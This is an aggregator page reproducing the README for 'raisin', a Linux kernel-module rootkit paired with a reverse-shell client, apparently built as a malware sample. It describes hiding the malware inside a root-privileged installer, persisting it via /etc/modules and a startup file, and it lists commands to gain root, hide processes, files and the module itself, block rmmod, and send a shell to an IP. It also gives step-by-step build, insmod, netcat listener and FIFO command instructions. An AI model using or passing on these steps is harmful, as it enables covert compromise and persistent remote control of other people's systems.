GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → asuar078 → raisin

asuar078 / raisin

Licence: GPL-2.0 license
Reverse shell and rootkit

Programming Languages

c
50402 projects - #5 most used programming language
Makefile
30231 projects

Labels

rootkitreverselkm

Projects that are alternatives of or similar to raisin

Solaris
A local LKM rootkit loader/dropper that lists available security mechanisms
Stars: ✭ 47 (+161.11%)
Mutual labels:  rootkit, lkm
django-js-routes
Expose and perform reverse lookups of Django URLs in the frontend world.
Stars: ✭ 20 (+11.11%)
Mutual labels:  reverse
first-steps-and-hardening-in-ubuntu-server-and-docker
First Steps in Ubuntu (Server) / Hardening and Config With Docker
Stars: ✭ 28 (+55.56%)
Mutual labels:  rootkit
NtSymbol
Resolve DOS MZ executable symbols at runtime
Stars: ✭ 78 (+333.33%)
Mutual labels:  rootkit
Vegile
This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell
Stars: ✭ 601 (+3238.89%)
Mutual labels:  rootkit
ReHitman
Hitman Gen 1 Reverse Engineering Project
Stars: ✭ 21 (+16.67%)
Mutual labels:  reverse
vex
reverse HTTP proxy tunnel via secure SSH connections.
Stars: ✭ 20 (+11.11%)
Mutual labels:  reverse
SMM-Rootkit
SMM rootkit similar to LoJax or MosaicRegressor
Stars: ✭ 44 (+144.44%)
Mutual labels:  rootkit
reverse android
安卓从开发到逆向
Stars: ✭ 65 (+261.11%)
Mutual labels:  reverse
CTF
CTF binary exploit code
Stars: ✭ 37 (+105.56%)
Mutual labels:  reverse
satan
🔓 x86 Linux Kernel rootkit for Debian 9 (4.9.0-11-686-pae)
Stars: ✭ 31 (+72.22%)
Mutual labels:  rootkit
tor-rootkit
A Python 3 standalone Windows 10 / Linux Rootkit using Tor.
Stars: ✭ 142 (+688.89%)
Mutual labels:  rootkit
CommentView-4-IDAPRO-7.0
CommentView 4 IDAPRO 7.0
Stars: ✭ 54 (+200%)
Mutual labels:  reverse
allsafe
Intentionally vulnerable Android application.
Stars: ✭ 135 (+650%)
Mutual labels:  reverse
cpu11
Revengineered ancient PDP-11 CPUs, originals and clones
Stars: ✭ 120 (+566.67%)
Mutual labels:  reverse
GifReversingBot
A Reddit bot that reverses gifs
Stars: ✭ 38 (+111.11%)
Mutual labels:  reverse
fnseedc
Collection of resources for Minecraft Seedcracking
Stars: ✭ 33 (+83.33%)
Mutual labels:  reverse
ReHitman
Hitman Blood Money Reverse Project
Stars: ✭ 29 (+61.11%)
Mutual labels:  reverse
leysourceengineclient
A source engine network client implementation based on some of my reversing work with basic functionality ( joining servers, talking, receiving/sending voicedata etc. ). Made this & reversed netchan to learn about Sources networking.
Stars: ✭ 122 (+577.78%)
Mutual labels:  reverse
toolset
Useful tools for CTF competitions
Stars: ✭ 31 (+72.22%)
Mutual labels:  reverse
View All Similar Projects ➔

Raisin Malware Ground Truth

Raisin can be download at https://github.com/asuar078/raisin, visit page to see instructions with markdown translated.

Created by:

  • Arian Suarez
  • Scott Dure
  • Donatto Punyed

The raisin malware is a combination rootkit and reverse shell application. The raisin malware uses the LKM created by Maxim Biro. Grape is a continuously running client application that will launch a reverse shell and can then be used to send commands to the LKM. The commands listed below, include gaining root access, hiding process, files and more.

The rootkit only works on Linux kernels up to 4.4.0-31 and has architecture-specific code in the rootkit which is implemented only for x86/ x86-64 architectures. The raisin malware was tested on a Ubuntu 14.04 and Ubuntu 16.04 VM. The reverse shell IP on the default build is set to the VM IP of 10.0.2.15 to change edit line 42 of grape.c.

Infection Method

The intention is to inject raisin into another download that requires root privileges to install. The installer will be altered to create the kernel module and grape client, then add the module to the /etc/modules file, and create a startup file for grape so both automatically run program on Linux startup.

Commands

Commands Description
root Grants you root shell access. Will happen automatically.
hpid $PID Hides the specified PID.
unpid $PID Unhides the specified PID.
hfile $FILENAME Hides the specified FILENAME globally. Must be a filename without any path
unfile $FILENAME Unhides the specified FILENAME.
hide Hides the rootkit LKM.
unhide Unhides the rootkit LKM.
protect Protects the rootkit from rmmod.
unprotect Disables the rmmod protection.
reverse $IP Sends start command to begin reverse shell at IP address, port is 443
touch Creates a pipe in /opt. A good test to see if root access is working

Instructions

  1. Run make to create rootkit and grape client. Will need to install build essentials if not already installed apt-get install build-essential
  2. Load the rootkit using sudo insmod rootkit.ko. The rootkit will hide itself so it can't be seen with lsmod till the unhide command is given.
  3. Open a listener for the reverse shell using sudo nc -lvp 443. The default build target IP is set for default VM IP of 10.0.2.15.
  4. Start the grape client ./grape. If no internet access is available grape will shutdown. If you wish to remove this simple delete line 74-75 in grape.c and recompile.
  5. The reverse shell is now active and can be used to send commands to the host machine.
  6. In the /tmp directory a pipe is created named grape_fifo. Sending echo -n commands to this pipe will allow access to rootkit and other functions.

Examples Commands

In order to avoid errors with c strings add the '\0' to the end of the line if using two words

echo -n "touch" > grape_fifo
echo -n "unhide" > grape_fifo
echo -n "hfile ../test.txt\0" > grape_fifo
echo -n "reverse 192.168.1.1\0" > grape_fifo

Notes

  • For hfile and unfile the path to the file must be from the perspective of the application where it was started.
  • grape will automatically close if no internet access is available.
  • Default build reverse shell IP address is set to 10.0.2.15 the default VM IP for testing in a VM, port 443.
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].